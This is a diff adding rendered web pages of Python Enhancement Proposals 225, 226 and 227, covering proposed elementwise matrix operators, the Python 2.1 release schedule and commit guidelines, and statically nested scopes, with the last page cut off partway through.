    • Benefits of infix operators with correct precedence rules.
    • +
    • Clean formulas in applications.
    • +
    +

    Disadvantage:

    +
      +
    • Hard to maintain in current Python because ordinary numbers cannot have +user defined class methods; i.e. a.E*b will fail if a is a pure +number.
    • +
    • Difficult to implement, as this will interfere with existing method calls, +like .T for transpose, etc.
    • +
    • Runtime overhead of object creation and method lookup.
    • +
    • The shadowing class cannot replace a true class, because it does not +return its own type. So there need to be a M class with shadow E +class, and an E class with shadow M class.
    • +
    • Unnatural to mathematicians.
    • +
    +
  4. Implement matrixwise and elementwise classes with easy casting to the other class. So matrixwise operations for arrays would be like a.M*b.M and elementwise operations for matrices would be like a.E*b.E. For error detection a.E*b.M would raise exceptions.

    Advantage:

    +
      +
    • No need for new operators.
    • +
    • Similar to infix notation with correct precedence rules.
    • +
    +

    Disadvantage:

    +
      +
    • Similar difficulty due to lack of user-methods for pure numbers.
    • +
    • Runtime overhead of object creation and method lookup.
    • +
    • More cluttered formulas.
    • +
    • Switching of flavor of objects to facilitate operators becomes persistent. +This introduces long range context dependencies in application code that +would be extremely hard to maintain.
    • +
    +
  5. Using mini parser to parse formulas written in arbitrary extension placed in quoted strings.

    Advantage:

    +
      +
    • Pure Python, without new operators
    • +
    +

    Disadvantage:

    +
      +
    • The actual syntax is within the quoted string, which does not resolve the +problem itself.
    • +
    • Introducing zones of special syntax.
    • +
    • Demanding on the mini-parser.
    • +
    +
  6. Introducing a single operator, such as @, for matrix multiplication.

    Advantage:

    +
      +
    • Introduces less operators
    • +
    +

    Disadvantage:

    +
      +
    • The distinctions for operators like + - ** are equally +important. Their meaning in matrix or array-oriented packages would be +reversed (see below).
    • +
    • The new operator occupies a special character.
    • +
    • This does not work well with more general object-element issues.
    • +
    +
+

Among these alternatives, the first and second are used in current applications to some extent, but have been found inadequate. The third is the favorite of applications, but it would incur huge implementation complexity. The fourth would make application code very context-sensitive and hard to maintain. These two alternatives also share significant implementation difficulties due to the current type/class split. The fifth appears to create more problems than it would solve. The sixth does not cover the same range of applications.

+
+
+

Alternative forms of infix operators

+

Two major forms and several minor variants of new infix operators were +discussed:

+
    +
  • Bracketed form:
    (op)
    +[op]
    +{op}
    +<op>
    +:op:
    +~op~
    +%op%
    +
    +
    +
  • +
  • Meta character form:
    .op
    +@op
    +~op
    +
    +
    +

    Alternatively the meta character is put after the operator.

    +
  • +
  • Less consistent variations of these themes. These are considered +unfavorably. For completeness some are listed here:
      +
    • Use @/ and /@ for left and right division
    • +
    • Use [*] and (*) for outer and inner products
    • +
    • Use a single operator @ for multiplication.
    • +
    +
  • +
  • Use __call__ to simulate multiplication:
    a(b) or (a)(b)
    +
    +
    +
  • +
+

Criteria for choosing among the representations include:

+
    +
  • No syntactical ambiguities with existing operators.
  • +
  • Higher readability in actual formulas. This makes the bracketed forms +unfavorable. See examples below.
  • +
  • Visually similar to existing math operators.
  • +
  • Syntactically simple, without blocking possible future extensions.
  • +
+

With these criteria the overall winner in bracket form appears to be {op}. A clear winner in the meta character form is ~op. Comparing these, it appears that ~op is the favorite among them all.

+

Some analysis is as follows:

+
    +
  • The .op form is ambiguous: 1.+a would be different from 1 .+a.
  • +
  • The bracket type operators are most favorable when standing alone, but +not in formulas, as they interfere with visual parsing of parentheses for +precedence and function argument. This is so for (op) and [op], and +somewhat less so for {op} and <op>.
  • +
  • The <op> form has the potential to be confused with < > and =.
  • +
  • The @op is not favored because @ is visually heavy (dense, more like +a letter): a@+b is more readily read as a@ + b than a @+ b.
  • +
  • For choosing meta-characters: Most of existing ASCII symbols have already +been used. The only three unused are @ $ ?.
  • +
+
+
+

Semantics of new operators

+

There are convincing arguments for using either set of operators as objectwise +or elementwise. Some of them are listed here:

+
    +
  1. op for element, ~op for object
      +
    • Consistent with current multiarray interface of Numeric package.
    • +
    • Consistent with some other languages.
    • +
    • Perception that elementwise operations are more natural.
    • +
    • Perception that elementwise operations are used more frequently
    • +
    +
  2. op for object, ~op for element
      +
    • Consistent with current linear algebra interface of MatPy package.
    • +
    • Consistent with some other languages.
    • +
    • Perception that objectwise operations are more natural.
    • +
    • Perception that objectwise operations are used more frequently.
    • +
    • Consistent with the current behavior of operators on lists.
    • +
    • Allow ~ to be a general elementwise meta-character in future +extensions.
    • +
    +
+

It is generally agreed upon that

+
    +
  • There is no absolute reason to favor one or the other.
  • +
  • It is easy to cast from one representation to another in a sizable chunk of code, so the other flavor of operators is always in the minority.
  • +
  • There are other semantic differences that favor existence of array-oriented +and matrix-oriented packages, even if their operators are unified.
  • +
  • Whatever decision is taken, code using existing interfaces should not be broken for a very long time.
  • +
+

Therefore, not much is lost, and much flexibility retained, if the semantic +flavors of these two sets of operators are not dictated by the core language. +The application packages are responsible for making the most suitable choice. +This is already the case for NumPy and MatPy which use opposite semantics. +Adding new operators will not break this. See also observation after +subsection 2 in the Examples below.

+

The issue of numerical precision was raised, but if the semantics is left to +the applications, the actual precisions should also go there.

+
+
+

Examples

+

Following are examples of the actual formulas that will appear using various +operators or other representations described above.

+
    +
  1. The matrix inversion formula:
      +
    • Using op for object and ~op for element:
      b = a.I - a.I * u / (c.I + v/a*u) * v / a
      +
      +b = a.I - a.I * u * (c.I + v*a.I*u).I * v * a.I
      +
      +
      +
    • +
    • Using op for element and ~op for object:
      b = a.I @- a.I @* u @/ (c.I @+ v@/a@*u) @* v @/ a
      +
      +b = a.I ~- a.I ~* u ~/ (c.I ~+ v~/a~*u) ~* v ~/ a
      +
      +b = a.I (-) a.I (*) u (/) (c.I (+) v(/)a(*)u) (*) v (/) a
      +
      +b = a.I [-] a.I [*] u [/] (c.I [+] v[/]a[*]u) [*] v [/] a
      +
      +b = a.I <-> a.I <*> u </> (c.I <+> v</>a<*>u) <*> v </> a
      +
      +b = a.I {-} a.I {*} u {/} (c.I {+} v{/}a{*}u) {*} v {/} a
      +
      +
      +
    • +
    +

    Observation: For linear algebra using op for object is preferable.

    +

    Observation: The ~op type operators look better than (op) type in +complicated formulas.

    +
      +
    • using named operators:
      b = a.I @sub a.I @mul u @div (c.I @add v @div a @mul u) @mul v @div a
      +
      +b = a.I ~sub a.I ~mul u ~div (c.I ~add v ~div a ~mul u) ~mul v ~div a
      +
      +
      +
    • +
    +

    Observation: Named operators are not suitable for math formulas.

    +
  2. Plotting a 3d graph
      +
    • Using op for object and ~op for element:
      z = sin(x~**2 ~+ y~**2);    plot(x,y,z)
      +
      +
      +
    • +
    • Using op for element and ~op for object:
      z = sin(x**2 + y**2);   plot(x,y,z)
      +
      +
      +
    • +
    +

    Observation: Elementwise operations with broadcasting allow a much more efficient implementation than MatLab.

    +

    Observation: It is useful to have two related classes with the semantics of +op and ~op swapped. Using these the ~op operators would only +need to appear in chunks of code where the other flavor dominates, while +maintaining consistent semantics of the code.

    +
  3. Using + and - with automatic broadcasting:
    a = b - c;  d = a.T*a
    +
    +
    +

    Observation: This would silently produce hard-to-trace bugs if one of b or +c is row vector while the other is column vector.

    +
+
+
+

Miscellaneous issues

+
    +
  • Need for the ~+ ~- operators. The objectwise + - are +important because they provide important sanity checks as per linear algebra. +The elementwise + - are important because they allow broadcasting +that are very efficient in applications.
  • +
  • Left division (solve). For matrices, a*x is not necessarily equal to x*a. The solution of a*x==b, denoted x=solve(a,b), is therefore different from the solution of x*a==b, denoted x=div(b,a). There are discussions about finding a new symbol for solve. [Background: MatLab uses b/a for div(b,a) and a\b for solve(a,b).]

    It is recognized that Python provides a better solution without requiring a +new symbol: the inverse method .I can be made to be delayed so that +a.I*b and b*a.I are equivalent to Matlab’s a\b and b/a. The +implementation is quite simple and the resulting application code clean.

    +
  • +
  • Power operator. Python’s use of a**b as pow(a,b) has two perceived +disadvantages:
      +
    • Most mathematicians are more familiar with a^b for this purpose.
    • +
    • It results in long augmented assignment operator ~**=.
    • +
    +

    However, this issue is distinct from the main issue here.

    +
  • +
  • Additional multiplication operators. Several forms of multiplications are +used in (multi-)linear algebra. Most can be seen as variations of +multiplication in linear algebra sense (such as Kronecker product). But two +forms appear to be more fundamental: outer product and inner product. +However, their specification includes indices, which can be either
      +
    • associated with the operator, or
    • +
    • associated with the objects.
    • +
    +

    The latter (the Einstein notation) is used extensively on paper, and is also +the easier one to implement. By implementing a tensor-with-indices class, a +general form of multiplication would cover both outer and inner products, and +specialize to linear algebra multiplication as well. The index rule can be +defined as class methods, like:

    +
    a = b.i(1,2,-1,-2) * c.i(4,-2,3,-1)   # a_ijkl = b_ijmn c_lnkm
    +
    +
    +

    Therefore, one objectwise multiplication is sufficient (a modern analogue of this index notation is sketched after this list).

    +
  • +
  • Bitwise operators.
      +
    • The proposed new math operators use the symbol ~ that is bitwise not +operator. This poses no compatibility problem but somewhat complicates +implementation.
    • +
    • The symbol ^ might be better used for pow than bitwise xor. But +this depends on the future of bitwise operators. It does not immediately +impact on the proposed math operator.
    • +
    • The symbol | was suggested to be used for matrix solve. But the new +solution of using delayed .I is better in several ways.
    • +
    • The current proposal fits in a larger and more general extension that will +remove the need for special bitwise operators. (See elementization below.)
    • +
    +
  • +
  • Alternative to special operator names used in definition,
    def "+"(a, b)      in place of       def __add__(a, b)
    +
    +
    +

    This appears to require greater syntactical change, and would only be useful +when arbitrary additional operators are allowed.

    +
  • +
+
+
+
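The tensor-with-indices idea in the multiplication item above has a direct modern analogue in NumPy’s einsum, which takes the Einstein-notation index rule as a string; a sketch under that assumption:

import numpy as np

b = np.ones((2, 3, 4, 5))                 # b_ijmn
c = np.ones((6, 5, 7, 4))                 # c_lnkm
a = np.einsum('ijmn,lnkm->ijkl', b, c)    # a_ijkl = b_ijmn c_lnkm
assert a.shape == (2, 3, 7, 6)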

Impact on general elementization

+

The distinction between objectwise and elementwise operations are meaningful in +other contexts as well, where an object can be conceptually regarded as a +collection of elements. It is important that the current proposal does not +preclude possible future extensions.

+

One general future extension is to use ~ as a meta operator to elementize +a given operator. Several examples are listed here:

+
    +
  1. Bitwise operators. Currently Python assigns six operators to bitwise +operations: and (&), or (|), xor (^), complement (~), left +shift (<<) and right shift (>>), with their own precedence levels.

    Among them, the & | ^ ~ operators can be regarded as elementwise versions of lattice operators applied to integers regarded as bit strings:

    +
    5 and 6                # 6
    +5 or 6                 # 5
    +
    +5 ~and 6               # 4
    +5 ~or 6                # 7
    +
    +
    +

    These can be regarded as general elementwise lattice operators, not +restricted to bits in integers.

    +

    In order to have named operators for xor ~xor, it is necessary to +make xor a reserved word.

    +
  2. List arithmetic:
    [1, 2] + [3, 4]        # [1, 2, 3, 4]
    +[1, 2] ~+ [3, 4]       # [4, 6]
    +
    +['a', 'b'] * 2         # ['a', 'b', 'a', 'b']
    +'ab' * 2               # 'abab'
    +
    +['a', 'b'] ~* 2        # ['aa', 'bb']
    +[1, 2] ~* 2            # [2, 4]
    +
    +
    +

    It is also consistent to Cartesian product:

    +
    [1,2]*[3,4]            # [(1,3),(1,4),(2,3),(2,4)]
    +
    +
    +
  3. List comprehension:
    a = [1, 2]; b = [3, 4]
    +~f(a,b)                # [f(x,y) for x, y in zip(a,b)]
    +~f(a*b)                # [f(x,y) for x in a for y in b]
    +a ~+ b                 # [x + y for x, y in zip(a,b)]
    +
    +
    +
  4. Tuple generation (the zip function in Python 2.0):
    [1, 2, 3], [4, 5, 6]   # ([1,2, 3], [4, 5, 6])
    +[1, 2, 3]~,[4, 5, 6]   # [(1,4), (2, 5), (3,6)]
    +
    +
    +
  5. Using ~ as generic elementwise meta-character to replace map:
    ~f(a, b)               # map(f, a, b)
    +~~f(a, b)              # map(lambda *x:map(f, *x), a, b)
    +
    +
    +

    More generally:

    +
    def ~f(*x): return map(f, *x)
    +def ~~f(*x): return map(~f, *x)
    +...
    +
    +
    +
  6. Elementwise format operator (with broadcasting):
    a = [1,2,3,4,5]
    +print ["%5d "] ~% a
    +a = [[1,2],[3,4]]
    +print ["%5d "] ~~% a
    +
    +
    +
  7. Rich comparison:
    [1, 2, 3]  ~< [3, 2, 1]  # [1, 0, 0]
    +[1, 2, 3] ~== [3, 2, 1]  # [0, 1, 0]
    +
    +
    +
  8. Rich indexing:
    [a, b, c, d] ~[2, 3, 1]  # [c, d, b]
    +
    +
    +
  9. Tuple flattening:
    a = (1,2);  b = (3,4)
    +f(~a, ~b)                # f(1,2,3,4)
    +
    +
    +
  10. Copy operator:
    a ~= b                   # a = b.copy()
    +
    +
    +
+
+
There can be specific levels of deep copy:
a ~~= b                  # a = b.copy(2)
+
+
+
+
+
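Most of the elementwise conveniences imagined in this section are spelled today with comprehensions and zip(), which is the direction Python actually took; a few checks of the equivalences claimed above:

a, b = [1, 2], [3, 4]
assert [x + y for x, y in zip(a, b)] == [4, 6]                 # a ~+ b
assert [x * 2 for x in ['a', 'b']] == ['aa', 'bb']             # ['a','b'] ~* 2
assert [x < y for x, y in zip([1, 2, 3], [3, 2, 1])] == [True, False, False]  # ~<
assert [(x, y) for x in a for y in b] == [(1, 3), (1, 4), (2, 3), (2, 4)]     # a*b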

Notes

+
    +
  1. There are probably many other similar situations. This general approach +seems well suited for most of them, in place of several separated extensions +for each of them (parallel and cross iteration, list comprehension, rich +comparison, etc).
  2. The semantics of elementwise operations depend on the application. For example, an element of a matrix is two levels down from the list-of-list point of view. This requires a more fundamental change than the current proposal. In any case, the current proposal will not negatively impact future possibilities of this nature.
+

Note that this section describes a type of future extensions that is consistent +with current proposal, but may present additional compatibility or other +problems. They are not tied to the current proposal.

+
+
+
+

Impact on named operators

+

The discussions made it generally clear that infix operators are a scarce resource in Python, not only in numerical computation, but in other fields as well. Several proposals and ideas were put forward that would allow infix operators to be introduced in ways similar to named functions. We show here that the current extension does not negatively impact future extensions in this regard.

+
    +
  1. Named infix operators.

    Choose a meta character, say @, so that for any identifier opname, +the combination @opname would be a binary infix operator, and:

    +
    a @opname b == opname(a,b)
    +
    +
    +

    Other representations mentioned include:

    +
    .name ~name~ :name: (.name) %name%
    +
    +
    +

    and similar variations. The pure bracket based operators cannot be used +this way.

    +

    This requires a change in the parser to recognize @opname, and parse it +into the same structure as a function call. The precedence of all these +operators would have to be fixed at one level, so the implementation would +be different from additional math operators which keep the precedence of +existing math operators.

    +

    The current proposed extension do not limit possible future extensions of +such form in any way.

    +
  2. More general symbolic operators.

    One additional form of future extension is to use meta character and +operator symbols (symbols that cannot be used in syntactical structures +other than operators). Suppose @ is the meta character. Then:

    +
    a + b,    a @+ b,    a @@+ b,  a @+- b
    +
    +
    +

    would all be operators with a hierarchy of precedence, defined by:

    +
    def "+"(a, b)
    +def "@+"(a, b)
    +def "@@+"(a, b)
    +def "@+-"(a, b)
    +
    +
    +

    One advantage compared with named operators is greater flexibility for +precedences based on either the meta character or the ordinary operator +symbols. This also allows operator composition. The disadvantage is that +they are more like line noise. In any case the current proposal does not +impact its future possibility.

    +

    These kinds of future extensions may not be necessary when Unicode becomes +generally available.

    +

    Note that this section discusses compatibility of the proposed extension +with possible future extensions. The desirability or compatibility of these +other extensions themselves are specifically not considered here.

    +
+
+
+

Credits and archives

+

The discussions mostly happened in July to August of 2000 on news group +comp.lang.python and the mailing list python-dev. There are altogether several +hundred postings, most can be retrieved from these two pages (and searching +word “operator”):

+
+
+

The names of contributors are too numerous to mention here, suffice to say that +a large proportion of ideas discussed here are not our own.

+

Several key postings (from our point of view) that may help to navigate the +discussions include:

+
+
http://www.python.org/pipermail/python-list/2000-July/108893.html +http://www.python.org/pipermail/python-list/2000-July/108777.html +http://www.python.org/pipermail/python-list/2000-July/108848.html +http://www.python.org/pipermail/python-list/2000-July/109237.html +http://www.python.org/pipermail/python-list/2000-July/109250.html +http://www.python.org/pipermail/python-list/2000-July/109310.html +http://www.python.org/pipermail/python-list/2000-July/109448.html +http://www.python.org/pipermail/python-list/2000-July/109491.html +http://www.python.org/pipermail/python-list/2000-July/109537.html +http://www.python.org/pipermail/python-list/2000-July/109607.html +http://www.python.org/pipermail/python-list/2000-July/109709.html +http://www.python.org/pipermail/python-list/2000-July/109804.html +http://www.python.org/pipermail/python-list/2000-July/109857.html +http://www.python.org/pipermail/python-list/2000-July/110061.html +http://www.python.org/pipermail/python-list/2000-July/110208.html +http://www.python.org/pipermail/python-list/2000-August/111427.html +http://www.python.org/pipermail/python-list/2000-August/111558.html +http://www.python.org/pipermail/python-list/2000-August/112551.html +http://www.python.org/pipermail/python-list/2000-August/112606.html +http://www.python.org/pipermail/python-list/2000-August/112758.html

http://www.python.org/pipermail/python-dev/2000-July/013243.html +http://www.python.org/pipermail/python-dev/2000-July/013364.html +http://www.python.org/pipermail/python-dev/2000-August/014940.html

+
+

These are earlier drafts of this PEP:

+
+
+

There is an alternative PEP (officially, PEP 211) by Greg Wilson, titled +“Adding New Linear Algebra Operators to Python”.

+

Its first (and current) version is at:

+
+
+
+
+

Additional References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0225.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0226/index.html b/pep-0226/index.html new file mode 100644 index 00000000000..499d5efc114 --- /dev/null +++ b/pep-0226/index.html @@ -0,0 +1,226 @@ + + + + + + + + PEP 226 – Python 2.1 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 226 – Python 2.1 Release Schedule

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
16-Oct-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the post Python 2.0 development and +release schedule. According to this schedule, Python 2.1 will be +released in April of 2001. The schedule primarily concerns +itself with PEP-size items. Small bug fixes and changes will +occur up until the first beta release.

+
+
+

Release Schedule

+

Tentative future release dates

+

[bugfix release dates go here]

+

Past release dates:

+
    +
  • 17-Apr-2001: 2.1 final release
  • +
  • 15-Apr-2001: 2.1 release candidate 2
  • +
  • 13-Apr-2001: 2.1 release candidate 1
  • +
  • 23-Mar-2001: Python 2.1 beta 2 release
  • +
  • 02-Mar-2001: First 2.1 beta release
  • +
  • 02-Feb-2001: Python 2.1 alpha 2 release
  • +
  • 22-Jan-2001: Python 2.1 alpha 1 release
  • +
  • 16-Oct-2000: Python 2.0 final release
  • +
+
+
+

Open issues for Python 2.0 beta 2

+

Add a default unit testing framework to the standard library.

+
+
+

Guidelines for making changes for Python 2.1

+

The guidelines and schedule will be revised based on discussion in +the python-dev@python.org mailing list.

+

The PEP system was instituted late in the Python 2.0 development +cycle and many changes did not follow the process described in PEP 1. +The development process for 2.1, however, will follow the PEP +process as documented.

+

The first eight weeks following 2.0 final will be the design and +review phase. By the end of this period, any PEP that is proposed +for 2.1 should be ready for review. This means that the PEP is +written and discussion has occurred on the python-dev@python.org +and python-list@python.org mailing lists.

+

The next six weeks will be spent reviewing the PEPs and +implementing and testing the accepted PEPs. When this period +stops, we will end consideration of any incomplete PEPs. Near the +end of this period, there will be a feature freeze where any small +features not worthy of a PEP will not be accepted.

+

Before the final release, we will have six weeks of beta testing +and a release candidate or two.

+
+
+

General guidelines for submitting patches and making changes

+

Use good sense when committing changes. You should know what we +mean by good sense or we wouldn’t have given you commit privileges +<0.5 wink>. Some specific examples of good sense include:

+
    +
  • Do whatever the dictator tells you.
  • +
  • Discuss any controversial changes on python-dev first. If you get a lot of +1 votes and no -1 votes, make the change. If you get some -1 votes, think twice; consider asking Guido what he thinks.
  • +
  • If the change is to code you contributed, it probably makes +sense for you to fix it.
  • +
  • If the change affects code someone else wrote, it probably makes +sense to ask him or her first.
  • +
  • You can use the SourceForge (SF) Patch Manager to submit a patch +and assign it to someone for review.
  • +
+

Any significant new feature must be described in a PEP and +approved before it is checked in.

+

Any significant code addition, such as a new module or large +patch, must include test cases for the regression test and +documentation. A patch should not be checked in until the tests +and documentation are ready.

+

If you fix a bug, you should write a test case that would have +caught the bug.

+

If you commit a patch from the SF Patch Manager or fix a bug from +the Jitterbug database, be sure to reference the patch/bug number +in the CVS log message. Also be sure to change the status in the +patch manager or bug database (if you have access to the bug +database).

+

It is not acceptable for any checked in code to cause the +regression test to fail. If a checkin causes a failure, it must +be fixed within 24 hours or it will be backed out.

+

All contributed C code must be ANSI C. If possible check it with +two different compilers, e.g. gcc and MSVC.

+

All contributed Python code must follow Guido’s Python style +guide. http://www.python.org/doc/essays/styleguide.html

+

It is understood that any code contributed will be released under +an Open Source license. Do not contribute code if it can’t be +released this way.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0226.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0227/index.html b/pep-0227/index.html new file mode 100644 index 00000000000..b2a53b5f7c9 --- /dev/null +++ b/pep-0227/index.html @@ -0,0 +1,602 @@ + + + + + + + + PEP 227 – Statically Nested Scopes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 227 – Statically Nested Scopes

+
+
Author:
+
Jeremy Hylton <jeremy at alum.mit.edu>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Nov-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes the addition of statically nested scoping +(lexical scoping) for Python 2.2, and as a source level option +for python 2.1. In addition, Python 2.1 will issue warnings about +constructs whose meaning may change when this feature is enabled.

+

The old language definition (2.0 and before) defines exactly three +namespaces that are used to resolve names – the local, global, +and built-in namespaces. The addition of nested scopes allows +resolution of unbound local names in enclosing functions’ +namespaces.

+

The most visible consequence of this change is that lambdas (and other nested functions) can reference variables defined in the surrounding namespace. Currently, lambdas must often use default arguments to explicitly create bindings in the lambda’s namespace.

+
+
+

Introduction

+

This proposal changes the rules for resolving free variables in +Python functions. The new name resolution semantics will take +effect with Python 2.2. These semantics will also be available in +Python 2.1 by adding “from __future__ import nested_scopes” to the +top of a module. (See PEP 236.)

+

The Python 2.0 definition specifies exactly three namespaces to +check for each name – the local namespace, the global namespace, +and the builtin namespace. According to this definition, if a +function A is defined within a function B, the names bound in B +are not visible in A. The proposal changes the rules so that +names bound in B are visible in A (unless A contains a name +binding that hides the binding in B).

+

This specification introduces rules for lexical scoping that are +common in Algol-like languages. The combination of lexical +scoping and existing support for first-class functions is +reminiscent of Scheme.

+

The changed scoping rules address two problems – the limited +utility of lambda expressions (and nested functions in general), +and the frequent confusion of new users familiar with other +languages that support nested lexical scopes, e.g. the inability +to define recursive functions except at the module level.

+

The lambda expression yields an unnamed function that evaluates a +single expression. It is often used for callback functions. In +the example below (written using the Python 2.0 rules), any name +used in the body of the lambda must be explicitly passed as a +default argument to the lambda.

+
from Tkinter import *
+root = Tk()
+Button(root, text="Click here",
+       command=lambda root=root: root.test.configure(text="..."))
+
+
+

This approach is cumbersome, particularly when there are several +names used in the body of the lambda. The long list of default +arguments obscures the purpose of the code. The proposed +solution, in crude terms, implements the default argument approach +automatically. The “root=root” argument can be omitted.

+
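A minimal sketch of the difference, using hypothetical names; the first form works under the Python 2.0 rules, the second requires nested scopes:

def make_scaler_old(factor):
    # Python 2.0 rules: bind 'factor' explicitly via a default argument
    return lambda x, factor=factor: x * factor

def make_scaler_new(factor):
    # nested scopes: the lambda references 'factor' directly
    return lambda x: x * factor

assert make_scaler_old(3)(4) == 12
assert make_scaler_new(3)(4) == 12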

The new name resolution semantics will cause some programs to +behave differently than they did under Python 2.0. In some cases, +programs will fail to compile. In other cases, names that were +previously resolved using the global namespace will be resolved +using the local namespace of an enclosing function. In Python +2.1, warnings will be issued for all statements that will behave +differently.

+
+
+

Specification

+

Python is a statically scoped language with block structure, in +the tradition of Algol. A code block or region, such as a +module, class definition, or function body, is the basic unit of a +program.

+

Names refer to objects. Names are introduced by name binding +operations. Each occurrence of a name in the program text refers +to the binding of that name established in the innermost function +block containing the use.

+

The name binding operations are argument declaration, assignment, +class and function definition, import statements, for statements, +and except clauses. Each name binding occurs within a block +defined by a class or function definition or at the module level +(the top-level code block).

+

If a name is bound anywhere within a code block, all uses of the +name within the block are treated as references to the current +block. (Note: This can lead to errors when a name is used within +a block before it is bound.)

+
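For example (an illustrative sketch; the assignment makes x local throughout f, so the first use fails at run time):

x = 10

def f():
    print x    # NameError when f() is called: the assignment below makes
    x = 5      # x local to the whole block, so the global x is never seen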

If the global statement occurs within a block, all uses of the +name specified in the statement refer to the binding of that name +in the top-level namespace. Names are resolved in the top-level +namespace by searching the global namespace, i.e. the namespace of +the module containing the code block, and in the builtin +namespace, i.e. the namespace of the __builtin__ module. The +global namespace is searched first. If the name is not found +there, the builtin namespace is searched. The global statement +must precede all uses of the name.

+
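For instance (a small sketch):

counter = 0

def bump():
    global counter      # all uses of 'counter' now refer to the module level
    counter = counter + 1

bump()
assert counter == 1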

If a name is used within a code block, but it is not bound there +and is not declared global, the use is treated as a reference to +the nearest enclosing function region. (Note: If a region is +contained within a class definition, the name bindings that occur +in the class block are not visible to enclosed functions.)

+

A class definition is an executable statement that may contain +uses and definitions of names. These references follow the normal +rules for name resolution. The namespace of the class definition +becomes the attribute dictionary of the class.

+

The following operations are name binding operations. If they +occur within a block, they introduce new local names in the +current block unless there is also a global declaration.

+
Function definition: def name ...
+Argument declaration: def f(...name...), lambda ...name...
+Class definition: class name ...
+Assignment statement: name = ...
+Import statement: import name, import module as name,
+    from module import name
+Implicit assignment: names are bound by for statements and except
+    clauses
+
+
+

There are several cases where Python statements are illegal when +used in conjunction with nested scopes that contain free +variables.

+

If a variable is referenced in an enclosed scope, it is an error +to delete the name. The compiler will raise a SyntaxError for +‘del name’.

+
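A sketch of the rejected form:

def f():
    x = 1
    def g():
        return x    # x is referenced in an enclosed scope...
    del x           # ...so this 'del x' is rejected at compile time
    return g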

If the wild card form of import (import *) is used in a function +and the function contains a nested block with free variables, the +compiler will raise a SyntaxError.

+

If exec is used in a function and the function contains a nested +block with free variables, the compiler will raise a SyntaxError +unless the exec explicitly specifies the local namespace for the +exec. (In other words, “exec obj” would be illegal, but +“exec obj in ns” would be legal.)

+
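A sketch of the two forms, in Python 2 syntax with hypothetical names:

def legal(code):
    ns = {}
    exec code in ns     # explicit namespace: allowed
    def g():
        return y        # free variable (here resolving to a global y)
    return g

# def illegal(code):
#     exec code         # bare exec plus a nested block with a free
#     def g():          # variable: the compiler raises a SyntaxError
#         return y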

If a name bound in a function scope is also the name of a module +global name or a standard builtin name, and the function contains +a nested function scope that references the name, the compiler +will issue a warning. The name resolution rules will result in +different bindings under Python 2.0 than under Python 2.2. The +warning indicates that the program may not run correctly with all +versions of Python.

+
+
+

Discussion

+

The specified rules allow names defined in a function to be +referenced in any nested function defined within that function. The +name resolution rules are typical for statically scoped languages, +with three primary exceptions:

+
    +
  • Names in class scope are not accessible.
  • +
  • The global statement short-circuits the normal rules.
  • +
  • Variables are not declared.
  • +
+

Names in class scope are not accessible. Names are resolved in +the innermost enclosing function scope. If a class definition +occurs in a chain of nested scopes, the resolution process skips +class definitions. This rule prevents odd interactions between +class attributes and local variable access. If a name binding +operation occurs in a class definition, it creates an attribute on +the resulting class object. To access this variable in a method, +or in a function nested within a method, an attribute reference +must be used, either via self or via the class name.

+
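A short sketch of the skip rule:

class Counter:
    limit = 10                      # class attribute

    def check(self, value):
        def nested():
            return limit            # NameError if called: class scope is skipped
        return value < self.limit   # attribute reference works as usual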

An alternative would have been to allow name binding in class +scope to behave exactly like name binding in function scope. This +rule would allow class attributes to be referenced either via +attribute reference or simple name. This option was ruled out +because it would have been inconsistent with all other forms of +class and instance attribute access, which always use attribute +references. Code that used simple names would have been obscure.

+

The global statement short-circuits the normal rules. Under the +proposal, the global statement has exactly the same effect that it +does for Python 2.0. It is also noteworthy because it allows name +binding operations performed in one block to change bindings in +another block (the module).

+

Variables are not declared. If a name binding operation occurs +anywhere in a function, then that name is treated as local to the +function and all references refer to the local binding. If a +reference occurs before the name is bound, a NameError is raised. +The only kind of declaration is the global statement, which allows +programs to be written using mutable global variables. As a +consequence, it is not possible to rebind a name defined in an +enclosing scope. An assignment operation can only bind a name in +the current scope or in the global scope. The lack of +declarations and the inability to rebind names in enclosing scopes +are unusual for lexically scoped languages; there is typically a +mechanism to create name bindings (e.g. lambda and let in Scheme) +and a mechanism to change the bindings (set! in Scheme).

+
+
+

Examples

+

A few examples are included to illustrate the way the rules work.

+
>>> def make_adder(base):
+...     def adder(x):
+...         return base + x
+...     return adder
+>>> add5 = make_adder(5)
+>>> add5(6)
+11
+
+>>> def make_fact():
+...     def fact(n):
+...         if n == 1:
+...             return 1L
+...         else:
+...             return n * fact(n - 1)
+...     return fact
+>>> fact = make_fact()
+>>> fact(7)
+5040L
+
+>>> def make_wrapper(obj):
+...     class Wrapper:
+...         def __getattr__(self, attr):
+...             if attr[0] != '_':
+...                 return getattr(obj, attr)
+...             else:
+...                 raise AttributeError, attr
+...     return Wrapper()
+>>> class Test:
+...     public = 2
+...     _private = 3
+>>> w = make_wrapper(Test())
+>>> w.public
+2
+>>> w._private
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+AttributeError: _private
+
+
+

An example from Tim Peters demonstrates the potential pitfalls of +nested scopes in the absence of declarations:

+
i = 6
+def f(x):
+    def g():
+        print i
+    # ...
+    # skip to the next page
+    # ...
+    for i in x:  # ah, i *is* local to f, so this is what g sees
+        pass
+    g()
+
+
+

The call to g() will refer to the variable i bound in f() by the for +loop. If g() is called before the loop is executed, a NameError will +be raised.

+
+
+

Backwards compatibility

+

